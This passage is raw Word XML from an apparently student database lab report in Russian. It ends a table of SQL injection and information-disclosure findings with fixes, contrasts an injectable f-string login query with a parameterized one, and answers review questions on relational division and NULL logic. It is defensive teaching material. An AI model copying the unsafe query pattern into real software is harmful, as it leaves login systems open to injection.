            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="38310FB2" w14:textId="77777777" w:rsidR="00223005" w:rsidRPr="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">обход авторизации и чтение таблицы </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>users</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4225" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4D33F2FC" w14:textId="77777777" w:rsidR="00223005" w:rsidRPr="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">параметризованные запросы </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>cursor.execute</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>sql</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>params</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00223005" w14:paraId="308436DA" w14:textId="77777777" w:rsidTr="00223005">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="089B2BF9" w14:textId="77777777" w:rsidR="00223005" w:rsidRPr="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Вывод объекта </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>RealDictRow</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> в ответе </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>login</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="43F29DEA" w14:textId="77777777" w:rsidR="00223005" w:rsidRPr="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>прямой канал утечки данных через UNION SELECT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4225" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4DA0E529" w14:textId="77777777" w:rsidR="00223005" w:rsidRPr="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>возвращать только нейтральный статус авторизации без внутренних данных</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00223005" w14:paraId="56A3D73C" w14:textId="77777777" w:rsidTr="00223005">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5B3924AE" w14:textId="77777777" w:rsidR="00223005" w:rsidRPr="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Доступ к </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>information_schema</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> и системным функциям</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3A411F19" w14:textId="77777777" w:rsidR="00223005" w:rsidRPr="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">получение структуры БД и характеристик </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>PostgreSQL</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4225" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6F52CD88" w14:textId="77777777" w:rsidR="00223005" w:rsidRPr="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>минимизация прав пользователя БД и ограничение лишних привилегий</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00223005" w14:paraId="66E150DB" w14:textId="77777777" w:rsidTr="00223005">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="66850A50" w14:textId="77777777" w:rsidR="00223005" w:rsidRPr="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Логин используется как </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>Bearer</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>-токен</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="18E98006" w14:textId="77777777" w:rsidR="00223005" w:rsidRPr="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">подмена пользователя и </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>SQLi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> в </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>Authorization</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4225" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="50E11B4E" w14:textId="77777777" w:rsidR="00223005" w:rsidRPr="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>серверные сессии или подписанные токены, не используемые напрямую в SQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00223005" w14:paraId="5D979538" w14:textId="77777777" w:rsidTr="00223005">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6CE7D35F" w14:textId="77777777" w:rsidR="00223005" w:rsidRPr="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>Werkzeug</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>Debugger</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> в ответах</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="14A4E058" w14:textId="77777777" w:rsidR="00223005" w:rsidRPr="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">раскрытие путей файлов и строк </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>backend</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>-кода</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4225" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="143F5B20" w14:textId="77777777" w:rsidR="00223005" w:rsidRPr="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">отключить </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>debug</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>-режим в рабочем окружении</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00223005" w14:paraId="392BB3FB" w14:textId="77777777" w:rsidTr="00223005">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1B4460D5" w14:textId="77777777" w:rsidR="00223005" w:rsidRPr="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>SQLite-стиль datetime(...) в PostgreSQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="29439CE7" w14:textId="77777777" w:rsidR="00223005" w:rsidRPr="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>ошибки выполнения и раскрытие технической информации</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4225" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="21E7155F" w14:textId="77777777" w:rsidR="00223005" w:rsidRPr="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>унифицировать SQL-код под используемую СУБД и покрыть тестами</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5CA46F2F" w14:textId="54842E36" w:rsidR="00223005" w:rsidRDefault="00223005" w:rsidP="00223005"/>
    <w:p w14:paraId="5194414C" w14:textId="273959EE" w:rsidR="00223005" w:rsidRPr="00C2601B" w:rsidRDefault="00223005" w:rsidP="00223005">
      <w:pPr>
        <w:pStyle w:val="ab"/>
      </w:pPr>
      <w:r w:rsidRPr="00223005">
        <w:t>Листинг 7 – Пример замены динамического SQL на параметризованный запрос</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af4"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9622"/>
      </w:tblGrid>
      <w:tr w:rsidR="00223005" w:rsidRPr="00C2601B" w14:paraId="0B054EF9" w14:textId="77777777" w:rsidTr="00603F8B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9622" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="66F9AF79" w14:textId="77777777" w:rsidR="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
            <w:pPr>
              <w:pStyle w:val="ac"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Небезопасно</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="13CDACEC" w14:textId="77777777" w:rsidR="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
            <w:pPr>
              <w:pStyle w:val="ac"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">query = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>f"SELECT</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> * FROM users WHERE login = '{username}' AND password = '{password}'"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="546F85CB" w14:textId="77777777" w:rsidR="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
            <w:pPr>
              <w:pStyle w:val="ac"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>cursor.execute</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>(query)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="556C8F17" w14:textId="77777777" w:rsidR="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
            <w:pPr>
              <w:pStyle w:val="ac"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="40BA5719" w14:textId="77777777" w:rsidR="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
            <w:pPr>
              <w:pStyle w:val="ac"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Безопаснее</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="47AC2995" w14:textId="77777777" w:rsidR="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
            <w:pPr>
              <w:pStyle w:val="ac"/>
            </w:pPr>
            <w:r>
              <w:t>query = "SELECT * FROM users WHERE login = %s AND password = %s"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F99D175" w14:textId="32C40841" w:rsidR="00223005" w:rsidRPr="00B02A76" w:rsidRDefault="00223005" w:rsidP="00223005">
            <w:pPr>
              <w:pStyle w:val="ac"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>cursor.execute</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>(query, (username, password))</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="72A5A7D4" w14:textId="77777777" w:rsidR="00223005" w:rsidRPr="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="085F7C76" w14:textId="6B30A29B" w:rsidR="00FA7108" w:rsidRPr="00223005" w:rsidRDefault="00FA7108" w:rsidP="00FA7108">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79B409FE" w14:textId="5037FB26" w:rsidR="00F868F8" w:rsidRPr="00223005" w:rsidRDefault="00F868F8" w:rsidP="00E014B6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00223005">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF05E65" w14:textId="77777777" w:rsidR="00F868F8" w:rsidRDefault="00F868F8" w:rsidP="00F868F8">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:keepNext/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc224281977"/>
      <w:bookmarkStart w:id="12" w:name="_Hlk224281988"/>
      <w:bookmarkStart w:id="13" w:name="_Hlk224283248"/>
      <w:bookmarkStart w:id="14" w:name="_Toc229005048"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Ответы на контрольные вопросы</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="6CED4A11" w14:textId="699A2C42" w:rsidR="000639B9" w:rsidRPr="000639B9" w:rsidRDefault="00572DB0" w:rsidP="000639B9">
      <w:pPr>
        <w:pStyle w:val="21"/>
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc229005049"/>
      <w:bookmarkEnd w:id="12"/>
      <w:bookmarkEnd w:id="13"/>
      <w:r>
        <w:t>Какие операции реляционной алгебры не поддерживаются в SQL напрямую</w:t>
      </w:r>
      <w:r w:rsidR="000639B9" w:rsidRPr="000639B9">
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="74EE2F4D" w14:textId="63A536A2"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В SQL напрямую не реализована операция деления реляционной алгебры; ее обычно выражают через NOT EXISTS, GROUP BY/HAVING или комбинацию вложенных запросов. Некоторые операции реляционной алгебры имеют SQL-аналоги не в чистом виде: переименование выполняется через AS, разность — через EXCEPT, декартово произведение — через CROSS JOIN</w:t>
      </w:r>
      <w:r w:rsidR="000639B9" w:rsidRPr="000639B9">
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="542DD2D8" w14:textId="64E14FE5" w:rsidR="00E11E5A"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Особенно важна операция деления, потому что она выражает условие “объект связан со всеми объектами из некоторого множества”. В SQL такой операции нет как отдельного ключевого слова. Поэтому ее приходится реализовывать через другие конструкции. Например, условие “сотрудник выполнил все операции из перечня” можно выразить через группировку и сравнение количества различных операций либо через двойной NOT EXISTS. В лабораторной работе этот принцип использовался при реализации третьего запроса.</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4CB76121" w14:textId="6BCD7856" w:rsidR="000639B9" w:rsidRPr="000639B9" w:rsidRDefault="00572DB0" w:rsidP="000639B9">
      <w:pPr>
        <w:pStyle w:val="21"/>
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc229005050"/>
      <w:r>
        <w:t>В чем особенности NULL значения в SQL</w:t>
      </w:r>
      <w:r w:rsidR="000639B9" w:rsidRPr="000639B9">
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w14:paraId="59B4C084" w14:textId="32C2E560"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NULL обозначает неопределенное или отсутствующее значение. Оно не равно ни одному значению, включая другой NULL. Для проверки используются IS NULL и IS NOT NULL. Обычные сравнения с NULL дают UNKNOWN, что влияет на фильтрацию в WHERE</w:t>
      </w:r>
      <w:r w:rsidR="000639B9" w:rsidRPr="000639B9">
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E65DE7" w14:textId="5B21E76B"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 xml:space="preserve">Практическая опасность NULL состоит в том, что он может незаметно изменить результат фильтрации. Например, выражение </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CA1A09">
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>effective_until</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CA1A09">
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> NOT IN (...) не является полноценной заменой проверки всех дат, если </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CA1A09">
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>effective_until</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CA1A09">
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> может быть NULL. Для таких случаев необходимо явно определить бизнес-смысл отсутствующего значения: считать ли документ бессрочным, исключать ли его из выборки или обрабатывать отдельным условием.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="064A5F19" w14:textId="77777777" w:rsidR="000639B9" w:rsidRPr="000639B9" w:rsidRDefault="000639B9" w:rsidP="000639B9">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E2EFF12" w14:textId="561CB4EA" w:rsidR="000639B9" w:rsidRPr="000639B9" w:rsidRDefault="00572DB0" w:rsidP="000639B9">
      <w:pPr>
        <w:pStyle w:val="21"/>
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Toc229005051"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Как трехзначная логика влияет на операции агрегирования</w:t>
      </w:r>
      <w:r w:rsidR="000639B9" w:rsidRPr="000639B9">
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w14:paraId="12E89333" w14:textId="3EB7DA86"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Агрегатные функции обычно игнорируют NULL-значения. SUM, AVG, MIN и MAX считают только определенные значения. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00572DB0">
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>COUNT(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00572DB0">
        <w:rPr>
          <w:rStyle w:val="affa"/>
